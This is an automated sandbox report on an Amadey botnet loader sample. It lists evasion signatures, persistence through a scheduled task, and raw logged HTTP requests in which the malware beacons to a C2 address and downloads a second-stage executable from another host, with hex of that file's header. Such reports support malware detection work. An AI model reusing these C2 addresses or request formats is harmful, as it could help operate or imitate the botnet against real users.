Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1502480
MD5:	457d9a15d305df62fe34c5076f3cad9d
SHA1:	7a068fb1e761874759a89534f39c1eb109367448
SHA256:	572d806c0b56d27fe05562301de6a9ed45cda3f36aef2f6e370867d9f3847013
Tags:	exe
Infos:

Detection

Amadey

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Potentially malicious time measurement code found

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file overlay found

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.16/	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeWindows	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.phpQ	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeta	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe6522427f	Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.php6	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exeD	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ws	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe00	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/ata	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exem32	Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/steam/random.exe5	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: explorti.exe.7756.7.memstrmin

Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.19/Vi9leo/index.php	Virustotal: Detection: 24%	Perma Link
Source: http://185.215.113.19/Vi9leo/index.php6	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/ws	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/steam/random.exe	Virustotal: Detection: 23%	Perma Link
Source: http://185.215.113.16/steam/random.exe6522427f	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.16/	Virustotal: Detection: 19%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	ReversingLabs: Detection: 57%
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Virustotal: Detection: 54%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\1000051000\2c422e6624.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49737 -> 185.215.113.19:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.19:80 -> 192.168.2.4:49737

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 185.215.113.19

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 01 Sep 2024 18:09:06 GMTContent-Type: application/octet-streamContent-Length: 1826304Last-Modified: Sun, 01 Sep 2024 15:41:45 GMTConnection: keep-aliveETag: "66d48b39-1bde00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 a0 69 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 69 00 00 04 00 00 f8 9a 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 f0 23 00 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 23 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 23 00 00 10 00 00 00 3c 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 23 00 00 00 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 23 00 00 02 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 20 2b 00 00 00 24 00 00 02 00 00 00 4e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 67 6f 64 6b 70 65 62 00 70 1a 00 00 20 4f 00 00 68 1a 00 00 50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 67 73 6d 66 71 66 00 10 00 00 00 90 69 00 00 04 00 00 00 b8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 69 00 00 22 00 00 00 bc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 41 42 37 32 41 37 38 42 31 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7AB72A78B15E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 185.215.113.19 185.215.113.19
Source: Joe Sandbox View	IP Address: 185.215.113.16 185.215.113.16

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 185.215.113.16:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.19
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 7_2_00A0BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,

7_2_00A0BD60

Source: global traffic

HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16

Source: unknown

HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ata
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe00
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe5
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe6522427f
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeD
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeWindows
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exem32
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeta
Source: explorti.exe, 00000007.00000002.2896830843.00000000015D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ws
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php
Source: explorti.exe, 00000007.00000002.2896830843.00000000015BF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.php6
Source: explorti.exe, 00000007.00000002.2896830843.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.19/Vi9leo/index.phpQ

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name:
Source: explorti.exe.0.dr	Static PE information: section name: .idata
Source: explorti.exe.0.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name:
Source: random[1].exe.7.dr	Static PE information: section name: .rsrc
Source: random[1].exe.7.dr	Static PE information: section name: .idata
Source: random[1].exe.7.dr	Static PE information: section name:
Source: 2c422e6624.exe.7.dr	Static PE information: section name:
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .rsrc
Source: 2c422e6624.exe.7.dr	Static PE information: section name: .idata
Source: 2c422e6624.exe.7.dr	Static PE information: section name:

Creates files inside the system directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\explorti.job

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A0E440	7_2_00A0E440
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A04CF0	7_2_00A04CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A43068	7_2_00A43068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A37D83	7_2_00A37D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A04AF0	7_2_00A04AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A4765B	7_2_00A4765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A42BD0	7_2_00A42BD0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A48720	7_2_00A48720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A46F09	7_2_00A46F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 7_2_00A4777B	7_2_00A4777B

Source: random[1].exe.7.dr	Static PE information: Data appended to the last section found
Source: 2c422e6624.exe.7.dr	Static PE information: Data appended to the last section found

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9999786543715847
Source: file.exe	Static PE information: Section: mlkfqtwe ZLIB complexity 0.9943439640410959
Source: explorti.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9999786543715847
Source: explorti.exe.0.dr	Static PE information: Section: mlkfqtwe ZLIB complexity 0.9943439640410959
Source: random[1].exe.7.dr	Static PE information: Section: agodkpeb ZLIB complexity 0.9952814509812006
Source: 2c422e6624.exe.7.dr	Static PE information: Section: agodkpeb ZLIB complexity 0.9952814509812006

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.850000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Unpacked PE file: 1.2.explorti.exe.a00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mlkfqtwe:EW;ezviljwn:EW;.taggant:EW;
